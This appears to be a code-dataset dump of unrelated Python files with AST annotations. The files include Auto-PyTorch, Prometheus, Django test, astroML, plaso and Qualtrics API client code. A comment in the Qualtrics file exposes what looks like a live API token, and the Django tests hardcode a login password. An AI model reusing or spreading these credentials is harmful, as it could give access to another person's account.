(18, 21, 18, 39): '"""checklicenses.py"""'}, {}), "(common.SRC_DIR, 'tools', 'checklicenses', 'checklicenses.py')", False, 'import os\n')] |
gaohuan2015/Auto-PyTorch | autoPyTorch/utils/benchmarking/benchmark_pipeline/for_autonet_config.py | 3c6bf7e051b32284d2655cc484aee1a8c982c04e |
from autoPyTorch.utils.config.config_option import ConfigOption
from autoPyTorch.pipeline.base.sub_pipeline_node import SubPipelineNode
import traceback
class ForAutoNetConfig(SubPipelineNode):
def fit(self, pipeline_config, autonet, instance, data_manager, run_id, task_id):
for config_file in self.get_config_files(pipeline_config):
try:
self.sub_pipeline.fit_pipeline(pipeline_config=pipeline_config,
autonet=autonet, instance=instance, data_manager=data_manager,
autonet_config_file=config_file, run_id=run_id, task_id=task_id)
except Exception as e:
print(e)
traceback.print_exc()
return dict()
def get_pipeline_config_options(self):
options = [
ConfigOption("autonet_configs", default=None, type='directory', list=True, required=True),
ConfigOption("autonet_config_slice", default=None, type=str)
]
return options
@staticmethod
def get_config_files(pipeline_config, parse_slice=True):
config_files = pipeline_config['autonet_configs']
autonet_config_slice = ForAutoNetConfig.parse_slice(pipeline_config['autonet_config_slice'])
if autonet_config_slice is not None and parse_slice:
return config_files[autonet_config_slice]
return config_files
@staticmethod
def parse_slice(splice_string):
if (splice_string is None):
return None
split = splice_string.split(":")
if len(split) == 1:
start = int(split[0]) if split[0] != "" else 0
stop = (int(split[0]) + 1) if split[0] != "" else None
step = 1
elif len(split) == 2:
start = int(split[0]) if split[0] != "" else 0
stop = int(split[1]) if split[1] != "" else None
step = 1
elif len(split) == 3:
start = int(split[0]) if split[0] != "" else 0
stop = int(split[1]) if split[1] != "" else None
step = int(split[2]) if split[2] != "" else 1
return slice(start, stop, step) | [((20, 12, 20, 101), 'autoPyTorch.utils.config.config_option.ConfigOption', 'ConfigOption', (), '', False, 'from autoPyTorch.utils.config.config_option import ConfigOption\n'), ((21, 12, 21, 72), 'autoPyTorch.utils.config.config_option.ConfigOption', 'ConfigOption', (), '', False, 'from autoPyTorch.utils.config.config_option import ConfigOption\n'), ((15, 16, 15, 37), 'traceback.print_exc', 'traceback.print_exc', ({}, {}), '()', False, 'import traceback\n')] |
RobustPerception/python_examples | csv/query_csv.py | c79e8f4745fe255fc327e31e96a2065dedca23c1 | import csv
import requests
import sys
"""
A simple program to print the result of a Prometheus query as CSV.
"""
if len(sys.argv) != 3:
print('Usage: {0} http://prometheus:9090 a_query'.format(sys.argv[0]))
sys.exit(1)
response = requests.get('{0}/api/v1/query'.format(sys.argv[1]),
params={'query': sys.argv[2]})
results = response.json()['data']['result']
# Build a list of all labelnames used.
labelnames = set()
for result in results:
labelnames.update(result['metric'].keys())
# Canonicalize
labelnames.discard('__name__')
labelnames = sorted(labelnames)
writer = csv.writer(sys.stdout)
# Write the header,
writer.writerow(['name', 'timestamp', 'value'] + labelnames)
# Write the samples.
for result in results:
l = [result['metric'].get('__name__', '')] + result['value']
for label in labelnames:
l.append(result['metric'].get(label, ''))
writer.writerow(l)
| [((26, 9, 26, 31), 'csv.writer', 'csv.writer', ({(26, 20, 26, 30): 'sys.stdout'}, {}), '(sys.stdout)', False, 'import csv\n'), ((11, 4, 11, 15), 'sys.exit', 'sys.exit', ({(11, 13, 11, 14): '(1)'}, {}), '(1)', False, 'import sys\n')] |
Miravalier/canonfire | src/python/errors.py | 7eeb93270ec3f3332fa039f3a9d0e8b3b2c86263 | class AuthError(Exception):
pass
class JsonError(Exception):
pass
| [] |
COS301-SE-2020/ctrlintelligencecapstone | vehicle/tests.py | ddfc92408ed296c6bf64b2dd071b948a1446ede8 | from rest_framework.test import APITestCase
from rest_framework.test import APIRequestFactory
import requests
import pytest
import json
from django.core.management import call_command
from django.db.models.signals import pre_save, post_save, pre_delete, post_delete, m2m_changed
from rest_framework.test import APIClient
# Create your tests here.
# @pytest.fixture(autouse=True)
# def django_db_setup(django_db_setup, django_db_blocker):
# signals = [pre_save, post_save, pre_delete, post_delete, m2m_changed]
# restore = {}
# with django_db_blocker.unblock():
# call_command("loaddata", "test_stuff.json")
def get_valid_token(client):
client = APIClient()
login_data = {
"username": "steve",
"password": "inferno77"
}
response = client.post('/api-auth/', data=login_data, format='json', headers={'Content-Type': 'application/json'})
assert response.status_code == 400
response.render()
response_string = response.content.decode("utf-8")
return json.loads(response_string).get("token")
@pytest.mark.django_db
def test_add_vehicle_basic(client):
url = '/api/v1/vehicle/add_vehicle_basic/'
data = {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
token = get_valid_token(client)
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Token {}'.format(token))
response = client.post(url, data=data, format='json')
assert response.status_code == 401
@pytest.mark.django_db
def test_get_vehicle(client):
url = '/api/v1/vehicle/get_vehicle/'
data = {
'license_plate' : 'BE32SNGP'
}
response = client.post(url,data)
assert response.status_code == 401
@pytest.mark.django_db
def test_search(client):
url = '/api/v1/vehicle/search/'
data = {
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
response = client.post(url,data, format='json')
assert response.status_code == 401
@pytest.mark.django_db
def test_file_recognize(client):
import pathlib
url = '/api/v1/vehicle/file_recognize/'
# response = client.post(url,data)
path = pathlib.Path(__file__).parent.absolute()
actual_path ='{}/test_images/2015-BMW-320d-xDrive-Touring-test-drive-67.jpg'.format(path)
files = [
('file', open("{}".format(actual_path), 'rb'))
]
data = {
'file' : files[0]
}
response = client.post(url, data=data, files=files)
assert response.status_code == 401
@pytest.mark.django_db
def test_search_advanced_and(client):
url = '/api/v1/vehicle/search_advances/'
data = {
'type' : 'and',
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
# response = client.post(url,data)
response = client.post(url, data=data, format="json")
assert response.status_code == 401
@pytest.mark.django_db
def test_get_duplicates(client):
url = '/api/v1/vehicle/get_duplicates/'
data = {
'type' : 'and',
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
# response = client.post(url,data)
response = client.post(url, data=data, format="json")
assert response.status_code == 401
@pytest.mark.django_db
def test_saps_flagged(client):
url = '/api/v1/vehicle/get_saps_flagged/'
data = {
'type' : 'and',
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
# response = client.post(url,data)
response = client.post(url, data=data, format="json")
assert response.status_code == 401
@pytest.mark.django_db
def test_search_advanced_or(client):
url = '/api/v1/vehicle/search_advances/'
data = {
'type' : 'or',
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
# response = client.post(url,data)
response = client.post(url, data=data, format="json")
assert response.status_code == 401
| [((28, 13, 28, 24), 'rest_framework.test.APIClient', 'APIClient', ({}, {}), '()', False, 'from rest_framework.test import APIClient\n'), ((53, 13, 53, 24), 'rest_framework.test.APIClient', 'APIClient', ({}, {}), '()', False, 'from rest_framework.test import APIClient\n'), ((39, 11, 39, 38), 'json.loads', 'json.loads', ({(39, 22, 39, 37): 'response_string'}, {}), '(response_string)', False, 'import json\n'), ((93, 11, 93, 33), 'pathlib.Path', 'pathlib.Path', ({(93, 24, 93, 32): '__file__'}, {}), '(__file__)', False, 'import pathlib\n')] |
ilante/programming_immanuela_englander | simple_exercises/lanesexercises/py_functions2/rep_ex3.py | 45d51c99b09ae335a67e03ac5ea79fc775bdf0bd |
# 3. Define a function to check whether a number is even
def even(num):
if num%2 == 0:
return True
else:
return False
print(even(4))
print(even(-5))
| [] |
aragilar/astroML | book_figures/chapter5/fig_posterior_cauchy.py | d3f6279eb632957662338761cb559a1dcd541fb0 | """
Posterior for Cauchy Distribution
---------------------------------
Figure 5.11
The solid lines show the posterior pdf :math:`p(\mu|{x_i},I)` (top-left panel)
and the posterior pdf :math:`p(\gamma|{x_i},I)` (top-right panel) for the
two-dimensional pdf from figure 5.10. The dashed lines show the distribution
of approximate estimates of :math:`\mu` and :math:`\gamma` based on the median
and interquartile range. The bottom panels show the corresponding cumulative
distributions.
"""
# Author: Jake VanderPlas
# License: BSD
# The figure produced by this code is published in the textbook
# "Statistics, Data Mining, and Machine Learning in Astronomy" (2013)
# For more information, see http://astroML.github.com
# To report a bug or issue, use the following forum:
# https://groups.google.com/forum/#!forum/astroml-general
import numpy as np
from matplotlib import pyplot as plt
from scipy.stats import cauchy
from astroML.stats import median_sigmaG
from astroML.resample import bootstrap
#----------------------------------------------------------------------
# This function adjusts matplotlib settings for a uniform feel in the textbook.
# Note that with usetex=True, fonts are rendered with LaTeX. This may
# result in an error if LaTeX is not installed on your system. In that case,
# you can set usetex to False.
from astroML.plotting import setup_text_plots
setup_text_plots(fontsize=8, usetex=True)
def cauchy_logL(x, gamma, mu):
"""Equation 5.74: cauchy likelihood"""
x = np.asarray(x)
n = x.size
# expand x for broadcasting
shape = np.broadcast(gamma, mu).shape
x = x.reshape(x.shape + tuple([1 for s in shape]))
return ((n - 1) * np.log(gamma)
- np.sum(np.log(gamma ** 2 + (x - mu) ** 2), 0))
def estimate_mu_gamma(xi, axis=None):
"""Equation 3.54: Cauchy point estimates"""
q25, q50, q75 = np.percentile(xi, [25, 50, 75], axis=axis)
return q50, 0.5 * (q75 - q25)
#------------------------------------------------------------
# Draw a random sample from the cauchy distribution, and compute
# marginalized posteriors of mu and gamma
np.random.seed(44)
n = 10
mu_0 = 0
gamma_0 = 2
xi = cauchy(mu_0, gamma_0).rvs(n)
gamma = np.linspace(0.01, 5, 70)
dgamma = gamma[1] - gamma[0]
mu = np.linspace(-3, 3, 70)
dmu = mu[1] - mu[0]
likelihood = np.exp(cauchy_logL(xi, gamma[:, np.newaxis], mu))
pmu = likelihood.sum(0)
pmu /= pmu.sum() * dmu
pgamma = likelihood.sum(1)
pgamma /= pgamma.sum() * dgamma
#------------------------------------------------------------
# bootstrap estimate
mu_bins = np.linspace(-3, 3, 21)
gamma_bins = np.linspace(0, 5, 17)
mu_bootstrap, gamma_bootstrap = bootstrap(xi, 20000, estimate_mu_gamma,
kwargs=dict(axis=1), random_state=0)
#------------------------------------------------------------
# Plot results
fig = plt.figure(figsize=(5, 5))
fig.subplots_adjust(wspace=0.35, right=0.95,
hspace=0.2, top=0.95)
# first axes: mu posterior
ax1 = fig.add_subplot(221)
ax1.plot(mu, pmu, '-k')
ax1.hist(mu_bootstrap, mu_bins, normed=True,
histtype='step', color='b', linestyle='dashed')
ax1.set_xlabel(r'$\mu$')
ax1.set_ylabel(r'$p(\mu|x,I)$')
# second axes: mu cumulative posterior
ax2 = fig.add_subplot(223, sharex=ax1)
ax2.plot(mu, pmu.cumsum() * dmu, '-k')
ax2.hist(mu_bootstrap, mu_bins, normed=True, cumulative=True,
histtype='step', color='b', linestyle='dashed')
ax2.set_xlabel(r'$\mu$')
ax2.set_ylabel(r'$P(<\mu|x,I)$')
ax2.set_xlim(-3, 3)
# third axes: gamma posterior
ax3 = fig.add_subplot(222, sharey=ax1)
ax3.plot(gamma, pgamma, '-k')
ax3.hist(gamma_bootstrap, gamma_bins, normed=True,
histtype='step', color='b', linestyle='dashed')
ax3.set_xlabel(r'$\gamma$')
ax3.set_ylabel(r'$p(\gamma|x,I)$')
ax3.set_ylim(-0.05, 1.1)
# fourth axes: gamma cumulative posterior
ax4 = fig.add_subplot(224, sharex=ax3, sharey=ax2)
ax4.plot(gamma, pgamma.cumsum() * dgamma, '-k')
ax4.hist(gamma_bootstrap, gamma_bins, normed=True, cumulative=True,
histtype='step', color='b', linestyle='dashed')
ax4.set_xlabel(r'$\gamma$')
ax4.set_ylabel(r'$P(<\gamma|x,I)$')
ax4.set_ylim(-0.05, 1.1)
ax4.set_xlim(0, 4)
plt.show()
| [((32, 0, 32, 41), 'astroML.plotting.setup_text_plots', 'setup_text_plots', (), '', False, 'from astroML.plotting import setup_text_plots\n'), ((57, 0, 57, 18), 'numpy.random.seed', 'np.random.seed', ({(57, 15, 57, 17): '(44)'}, {}), '(44)', True, 'import numpy as np\n'), ((64, 8, 64, 32), 'numpy.linspace', 'np.linspace', ({(64, 20, 64, 24): '0.01', (64, 26, 64, 27): '5', (64, 29, 64, 31): '70'}, {}), '(0.01, 5, 70)', True, 'import numpy as np\n'), ((67, 5, 67, 27), 'numpy.linspace', 'np.linspace', ({(67, 17, 67, 19): '-3', (67, 21, 67, 22): '3', (67, 24, 67, 26): '70'}, {}), '(-3, 3, 70)', True, 'import numpy as np\n'), ((80, 10, 80, 32), 'numpy.linspace', 'np.linspace', ({(80, 22, 80, 24): '-3', (80, 26, 80, 27): '3', (80, 29, 80, 31): '21'}, {}), '(-3, 3, 21)', True, 'import numpy as np\n'), ((81, 13, 81, 34), 'numpy.linspace', 'np.linspace', ({(81, 25, 81, 26): '0', (81, 28, 81, 29): '5', (81, 31, 81, 33): '17'}, {}), '(0, 5, 17)', True, 'import numpy as np\n'), ((88, 6, 88, 32), 'matplotlib.pyplot.figure', 'plt.figure', (), '', True, 'from matplotlib import pyplot as plt\n'), ((128, 0, 128, 10), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'from matplotlib import pyplot as plt\n'), ((37, 8, 37, 21), 'numpy.asarray', 'np.asarray', ({(37, 19, 37, 20): 'x'}, {}), '(x)', True, 'import numpy as np\n'), ((50, 20, 50, 62), 'numpy.percentile', 'np.percentile', (), '', True, 'import numpy as np\n'), ((41, 12, 41, 35), 'numpy.broadcast', 'np.broadcast', ({(41, 25, 41, 30): 'gamma', (41, 32, 41, 34): 'mu'}, {}), '(gamma, mu)', True, 'import numpy as np\n'), ((62, 5, 62, 26), 'scipy.stats.cauchy', 'cauchy', ({(62, 12, 62, 16): 'mu_0', (62, 18, 62, 25): 'gamma_0'}, {}), '(mu_0, gamma_0)', False, 'from scipy.stats import cauchy\n'), ((44, 22, 44, 35), 'numpy.log', 'np.log', ({(44, 29, 44, 34): 'gamma'}, {}), '(gamma)', True, 'import numpy as np\n'), ((45, 21, 45, 55), 'numpy.log', 'np.log', ({(45, 28, 45, 54): '(gamma ** 2 + (x - mu) ** 2)'}, {}), '(gamma ** 2 + (x - mu) ** 2)', True, 'import numpy as np\n')] |
SamuelePilleri/plaso | plaso/formatters/file_system.py | f5687f12a89c7309797ccc285da78e855c120579 | # -*- coding: utf-8 -*-
"""The file system stat event formatter."""
from __future__ import unicode_literals
from dfvfs.lib import definitions as dfvfs_definitions
from plaso.formatters import interface
from plaso.formatters import manager
from plaso.lib import errors
class FileStatEventFormatter(interface.ConditionalEventFormatter):
"""The file system stat event formatter."""
DATA_TYPE = 'fs:stat'
FORMAT_STRING_PIECES = [
'{display_name}',
'Type: {file_entry_type}',
'({unallocated})']
FORMAT_STRING_SHORT_PIECES = [
'{filename}']
SOURCE_SHORT = 'FILE'
# The numeric values are for backwards compatibility with plaso files
# generated with older versions of dfvfs.
_FILE_ENTRY_TYPES = {
1: 'device',
2: 'directory',
3: 'file',
4: 'link',
5: 'socket',
6: 'pipe',
dfvfs_definitions.FILE_ENTRY_TYPE_DEVICE: 'device',
dfvfs_definitions.FILE_ENTRY_TYPE_DIRECTORY: 'directory',
dfvfs_definitions.FILE_ENTRY_TYPE_FILE: 'file',
dfvfs_definitions.FILE_ENTRY_TYPE_LINK: 'link',
dfvfs_definitions.FILE_ENTRY_TYPE_SOCKET: 'socket',
dfvfs_definitions.FILE_ENTRY_TYPE_PIPE: 'pipe'}
# pylint: disable=unused-argument
def GetMessages(self, formatter_mediator, event):
"""Determines the formatted message strings for an event object.
Args:
formatter_mediator (FormatterMediator): mediates the interactions
between formatters and other components, such as storage and Windows
EventLog resources.
event (EventObject): event.
Returns:
tuple(str, str): formatted message string and short message string.
Raises:
WrongFormatter: if the event object cannot be formatted by the formatter.
"""
if self.DATA_TYPE != event.data_type:
raise errors.WrongFormatter('Unsupported data type: {0:s}.'.format(
event.data_type))
event_values = event.CopyToDict()
file_entry_type = event_values.get('file_entry_type', None)
if file_entry_type is not None:
event_values['file_entry_type'] = self._FILE_ENTRY_TYPES.get(
file_entry_type, 'UNKNOWN')
# The usage of allocated is deprecated in favor of is_allocated but
# is kept here to be backwards compatible.
if (not event_values.get('allocated', False) and
not event_values.get('is_allocated', False)):
event_values['unallocated'] = 'unallocated'
return self._ConditionalFormatMessages(event_values)
def GetSources(self, event):
"""Determines the the short and long source for an event object.
Args:
event (EventObject): event.
Returns:
tuple(str, str): short and long source string.
Raises:
WrongFormatter: if the event object cannot be formatted by the formatter.
"""
if self.DATA_TYPE != event.data_type:
raise errors.WrongFormatter('Unsupported data type: {0:s}.'.format(
event.data_type))
file_system_type = getattr(event, 'file_system_type', 'UNKNOWN')
timestamp_desc = getattr(event, 'timestamp_desc', 'Time')
source_long = '{0:s} {1:s}'.format(file_system_type, timestamp_desc)
return self.SOURCE_SHORT, source_long
class NTFSFileStatEventFormatter(FileStatEventFormatter):
"""The NTFS file system stat event formatter."""
DATA_TYPE = 'fs:stat:ntfs'
FORMAT_STRING_PIECES = [
'{display_name}',
'File reference: {file_reference}',
'Attribute name: {attribute_name}',
'Name: {name}',
'Parent file reference: {parent_file_reference}',
'({unallocated})']
FORMAT_STRING_SHORT_PIECES = [
'{filename}',
'{file_reference}',
'{attribute_name}']
SOURCE_SHORT = 'FILE'
_ATTRIBUTE_NAMES = {
0x00000010: '$STANDARD_INFORMATION',
0x00000030: '$FILE_NAME'
}
def GetMessages(self, formatter_mediator, event):
"""Determines the formatted message strings for an event object.
Args:
formatter_mediator (FormatterMediator): mediates the interactions
between formatters and other components, such as storage and Windows
EventLog resources.
event (EventObject): event.
Returns:
tuple(str, str): formatted message string and short message string.
Raises:
WrongFormatter: if the event object cannot be formatted by the formatter.
"""
if self.DATA_TYPE != event.data_type:
raise errors.WrongFormatter('Unsupported data type: {0:s}.'.format(
event.data_type))
event_values = event.CopyToDict()
attribute_type = event_values.get('attribute_type', 0)
event_values['attribute_name'] = self._ATTRIBUTE_NAMES.get(
attribute_type, 'UNKNOWN')
file_reference = event_values.get('file_reference', None)
if file_reference:
event_values['file_reference'] = '{0:d}-{1:d}'.format(
file_reference & 0xffffffffffff, file_reference >> 48)
parent_file_reference = event_values.get('parent_file_reference', None)
if parent_file_reference:
event_values['parent_file_reference'] = '{0:d}-{1:d}'.format(
parent_file_reference & 0xffffffffffff, parent_file_reference >> 48)
if not event_values.get('is_allocated', False):
event_values['unallocated'] = 'unallocated'
return self._ConditionalFormatMessages(event_values)
class NTFSUSNChangeEventFormatter(interface.ConditionalEventFormatter):
"""The NTFS USN change event formatter."""
DATA_TYPE = 'fs:ntfs:usn_change'
FORMAT_STRING_PIECES = [
'{filename}',
'File reference: {file_reference}',
'Parent file reference: {parent_file_reference}',
'Update source: {update_source}',
'Update reason: {update_reason}']
FORMAT_STRING_SHORT_PIECES = [
'{filename}',
'{file_reference}',
'{update_reason}']
SOURCE_SHORT = 'FILE'
_USN_REASON_FLAGS = {
0x00000001: 'USN_REASON_DATA_OVERWRITE',
0x00000002: 'USN_REASON_DATA_EXTEND',
0x00000004: 'USN_REASON_DATA_TRUNCATION',
0x00000010: 'USN_REASON_NAMED_DATA_OVERWRITE',
0x00000020: 'USN_REASON_NAMED_DATA_EXTEND',
0x00000040: 'USN_REASON_NAMED_DATA_TRUNCATION',
0x00000100: 'USN_REASON_FILE_CREATE',
0x00000200: 'USN_REASON_FILE_DELETE',
0x00000400: 'USN_REASON_EA_CHANGE',
0x00000800: 'USN_REASON_SECURITY_CHANGE',
0x00001000: 'USN_REASON_RENAME_OLD_NAME',
0x00002000: 'USN_REASON_RENAME_NEW_NAME',
0x00004000: 'USN_REASON_INDEXABLE_CHANGE',
0x00008000: 'USN_REASON_BASIC_INFO_CHANGE',
0x00010000: 'USN_REASON_HARD_LINK_CHANGE',
0x00020000: 'USN_REASON_COMPRESSION_CHANGE',
0x00040000: 'USN_REASON_ENCRYPTION_CHANGE',
0x00080000: 'USN_REASON_OBJECT_ID_CHANGE',
0x00100000: 'USN_REASON_REPARSE_POINT_CHANGE',
0x00200000: 'USN_REASON_STREAM_CHANGE',
0x00400000: 'USN_REASON_TRANSACTED_CHANGE',
0x80000000: 'USN_REASON_CLOSE'}
_USN_SOURCE_FLAGS = {
0x00000001: 'USN_SOURCE_DATA_MANAGEMENT',
0x00000002: 'USN_SOURCE_AUXILIARY_DATA',
0x00000004: 'USN_SOURCE_REPLICATION_MANAGEMENT'}
def GetMessages(self, formatter_mediator, event):
"""Determines the formatted message strings for an event object.
Args:
formatter_mediator (FormatterMediator): mediates the interactions
between formatters and other components, such as storage and Windows
EventLog resources.
event (EventObject): event.
Returns:
tuple(str, str): formatted message string and short message string.
Raises:
WrongFormatter: if the event object cannot be formatted by the formatter.
"""
if self.DATA_TYPE != event.data_type:
raise errors.WrongFormatter('Unsupported data type: {0:s}.'.format(
event.data_type))
event_values = event.CopyToDict()
file_reference = event_values.get('file_reference', None)
if file_reference:
event_values['file_reference'] = '{0:d}-{1:d}'.format(
file_reference & 0xffffffffffff, file_reference >> 48)
parent_file_reference = event_values.get('parent_file_reference', None)
if parent_file_reference:
event_values['parent_file_reference'] = '{0:d}-{1:d}'.format(
parent_file_reference & 0xffffffffffff, parent_file_reference >> 48)
update_reason_flags = event_values.get('update_reason_flags', 0)
update_reasons = []
for bitmask, description in sorted(self._USN_REASON_FLAGS.items()):
if bitmask & update_reason_flags:
update_reasons.append(description)
event_values['update_reason'] = ', '.join(update_reasons)
update_source_flags = event_values.get('update_source_flags', 0)
update_sources = []
for bitmask, description in sorted(self._USN_SOURCE_FLAGS.items()):
if bitmask & update_source_flags:
update_sources.append(description)
event_values['update_source'] = ', '.join(update_sources)
return self._ConditionalFormatMessages(event_values)
manager.FormattersManager.RegisterFormatters([
FileStatEventFormatter, NTFSFileStatEventFormatter,
NTFSUSNChangeEventFormatter])
| [((266, 0, 268, 33), 'plaso.formatters.manager.FormattersManager.RegisterFormatters', 'manager.FormattersManager.RegisterFormatters', ({(266, 45, 268, 32): '[FileStatEventFormatter, NTFSFileStatEventFormatter,\n NTFSUSNChangeEventFormatter]'}, {}), '([FileStatEventFormatter,\n NTFSFileStatEventFormatter, NTFSUSNChangeEventFormatter])', False, 'from plaso.formatters import manager\n')] |
junlegend/back-landing-career | applications/serializers.py | cfc01b439629e48ff058fa1693af8d5a3a37949a | from rest_framework import serializers
from applications.models import Application
class ApplicationSerializer(serializers.Serializer):
content = serializers.JSONField()
portfolio = serializers.FileField()
class ApplicationAdminSerializer(serializers.ModelSerializer):
class Meta:
model = Application
fields = ['content', 'user', 'status', 'created_at', 'updated_at', 'recruits']
class ApplicationAdminPatchSerializer(serializers.ModelSerializer):
class Meta:
model = Application
fields = ['status'] | [((6, 16, 6, 39), 'rest_framework.serializers.JSONField', 'serializers.JSONField', ({}, {}), '()', False, 'from rest_framework import serializers\n'), ((7, 16, 7, 39), 'rest_framework.serializers.FileField', 'serializers.FileField', ({}, {}), '()', False, 'from rest_framework import serializers\n')] |
ycui1/QualtricsIAT | qualtrics_iat/qualtrics_tools.py | c81b12e2669e1e58b4653e85c0d22ac5a821b174 | from pathlib import Path
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
# api_token = "iNKzBVNVAoTMhwnT2amhZRAP4dTBjkEVw9AbpRWg"
# brand_center = "mdanderson.co1"
# data_center = "iad1"
# headers = {"x-api-token": api_token}
class QualtricsTool:
"""Data model to manage Qualtrics-related tools
Parameters:
-----------
api_token: str, the API token for the user
data_center: str, the data center for the user
brand_center: str, the brand center for the user
"""
def __init__(self, api_token=None, data_center=None, brand_center=None):
self.api_token = api_token
self.data_center = data_center
self.brand_center = brand_center
@property
def api_headers(self):
"""The default API headers"""
return {"x-api-token": self.api_token}
@property
def base_url(self):
"""The default base URL"""
return f"https://{self.data_center}.qualtrics.com"
@property
def api_base_url(self):
"""The default base API URL"""
return f"{self.base_url}/API/v3"
def upload_images_api(self,
local_image_folder,
library_id,
creating_full_url=True,
qualtrics_folder=None,
filename_pattern="*"):
"""Upload images from the local folder to the Qualtrics server
:param local_image_folder: str, Path, the local folder containing the images
:param library_id: str, Qualtrics library ID number
:param creating_full_url: bool, whether returns the IDs only or the full URLs
:param qualtrics_folder: str, the Qualtrics Graphics folder for the uploaded images
:param filename_pattern: str, the pattern using which to select the images for uploading
:return list[str], the list of image IDs or URLs
"""
upload_url = f"{self.api_base_url}/libraries/{library_id}/graphics"
image_urls = list()
for file in Path(local_image_folder).glob(filename_pattern):
file_type = Path(file)[1:]
if file_type not in ("png", "gif", "jpg", "jpeg"):
raise ValueError("Qualtrics only accepts PNG, GIF, and JPEG images.")
encoded_fields = {'file': (file.name, open(file, 'rb'), f'image/{file_type}')}
image_url_id = self._upload_image(encoded_fields, qualtrics_folder, upload_url, file, creating_full_url)
image_urls.append(image_url_id)
return image_urls
def upload_images_web(self,
image_files,
library_id,
creating_full_url,
qualtrics_folder,
image_type):
"""Upload images from the web app to the Qualtrics server
:param image_files: Bytes, the uploaded bytes data from the web app
:param library_id: str, Qualtrics library ID number
:param creating_full_url: bool, whether returns the IDs only or the full URLs
:param qualtrics_folder: str, the Qualtrics Graphics folder for the uploaded images
:param image_type: str, the image file type
:return list[str], the list of image IDs or URLs
"""
image_urls = list()
upload_url = f"{self.api_base_url}/libraries/{library_id}/graphics"
file_count_digit = len(str(len(image_files)))
for file_i, file in enumerate(image_files, start=1):
encoded_fields = {'file': (f"image{file_i:0>{file_count_digit}}.{image_type}", file, f'image/{image_type}')}
image_url_id = self._upload_image(encoded_fields, qualtrics_folder, upload_url, file, creating_full_url)
image_urls.append(image_url_id)
return image_urls
def _upload_image(self, encoded_fields, qualtrics_folder, upload_url, file, creating_full_url):
if qualtrics_folder:
encoded_fields['folder'] = qualtrics_folder
mp_encoder = MultipartEncoder(fields=encoded_fields)
post_request = requests.post(
upload_url,
data=mp_encoder,
headers={'Content-Type': mp_encoder.content_type, **self.api_headers}
)
try:
image_url_id = post_request.json()['result']['id']
except KeyError:
raise Exception(f"Failed to upload image {file.name}")
if creating_full_url:
image_url_id = f"{self.base_url}/ControlPanel/Graphic.php?IM={image_url_id}"
return image_url_id
def delete_images(self, library_id, image_url_ids):
"""Delete images from the specified library
:param library_id: str, the library ID number
:param image_url_ids: list[str], the image IDs or full URLs
:return dict, the deletion report"""
report = dict()
for image_url_id in image_url_ids:
if image_url_id.find("=") > 0:
image_url_id = image_url_id[image_url_id.index("=") + 1:]
url = f'{self.api_base_url}/libraries/{library_id}/graphics/{image_url_id}'
delete_response = requests.delete(url, headers=self.api_headers)
try:
http_status = delete_response.json()['meta']['httpStatus']
except KeyError:
raise Exception(f"Failed to delete image: {image_url_id}")
else:
report[image_url_id] = "Deleted" if http_status.startswith('200') else "Error"
return report
def create_survey(self, template_json):
"""Create the survey using the JSON template
:param template_json: str in the JSON format, the JSON file for the qsf file
:return str, the created Survey ID number
"""
upload_url = f"{self.api_base_url}/survey-definitions"
creation_response = requests.post(
upload_url,
json=template_json,
headers={**self.api_headers, "content-type": "application/json"}
)
try:
survey_id = creation_response.json()['result']['SurveyID']
except KeyError:
raise Exception("Couldn't create the survey. Please check the params.")
return survey_id
def delete_survey(self, survey_id):
"""Delete the survey
:param survey_id: str, the survey ID number
:return dict, the deletion report
"""
report = dict()
delete_url = f"{self.api_base_url}/survey-definitions/{survey_id}"
delete_response = requests.delete(delete_url, headers=self.api_headers)
try:
http_status = delete_response.json()['meta']['httpStatus']
except KeyError:
raise Exception(f"Failed to delete survey: {survey_id}")
else:
report[survey_id] = "Deleted" if http_status.startswith('200') else "Error"
return report
def export_responses(self, survey_id, file_format="csv", data_folder=None):
"""Export responses from the Qualtrics survey"""
download_url = f"{self.api_base_url}/surveys/{survey_id}/export-responses/"
download_payload = f'{{"format": "{file_format}"}}'
download_response = requests.post(
download_url,
data=download_payload,
headers={**self.api_headers, "content-type": "application/json"}
)
try:
progress_id = download_response.json()["result"]["progressId"]
file_id = self._monitor_progress(download_url, progress_id)
file_content = self._download_file(download_url, file_id)
except KeyError:
raise Exception("Can't download the responses. Please check the params.")
return file_content
def _monitor_progress(self, download_url, progress_id):
progress_status = "inProgress"
while progress_status != "complete" and progress_status != "failed":
progress_response = requests.get(download_url + progress_id, headers=self.api_headers)
progress_status = progress_response.json()["result"]["status"]
return progress_response.json()["result"]["fileId"]
def _download_file(self, download_url, file_id):
file_url = f"{download_url}/{file_id}/file"
file_response = requests.get(file_url, headers=self.api_headers, stream=True)
return file_response.content
| [((90, 21, 90, 60), 'requests_toolbelt.multipart.encoder.MultipartEncoder', 'MultipartEncoder', (), '', False, 'from requests_toolbelt.multipart.encoder import MultipartEncoder\n'), ((91, 23, 95, 9), 'requests.post', 'requests.post', (), '', False, 'import requests\n'), ((129, 28, 133, 9), 'requests.post', 'requests.post', (), '', False, 'import requests\n'), ((148, 26, 148, 79), 'requests.delete', 'requests.delete', (), '', False, 'import requests\n'), ((161, 28, 165, 9), 'requests.post', 'requests.post', (), '', False, 'import requests\n'), ((183, 24, 183, 85), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((114, 30, 114, 76), 'requests.delete', 'requests.delete', (), '', False, 'import requests\n'), ((177, 32, 177, 98), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((55, 20, 55, 44), 'pathlib.Path', 'Path', ({(55, 25, 55, 43): 'local_image_folder'}, {}), '(local_image_folder)', False, 'from pathlib import Path\n'), ((56, 24, 56, 34), 'pathlib.Path', 'Path', ({(56, 29, 56, 33): 'file'}, {}), '(file)', False, 'from pathlib import Path\n')] |
